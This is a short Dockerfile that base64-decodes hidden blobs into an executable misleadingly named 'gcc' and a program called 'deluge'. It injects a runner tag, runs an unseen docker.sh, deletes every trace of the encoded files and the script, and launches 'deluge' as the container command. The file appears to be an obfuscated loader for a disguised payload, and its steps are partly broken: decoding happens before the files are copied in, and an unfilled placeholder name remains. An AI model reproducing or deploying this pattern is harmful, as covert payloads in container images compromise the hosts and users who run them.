FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > deluge.log'

RUN base64 --decode deluge.64 > deluge
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY deluge .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' deluge
RUN bash ./docker.sh

RUN rm --force --recursive deluge _REPO_NAME__.64 docker.sh gcc gcc.64

CMD deluge
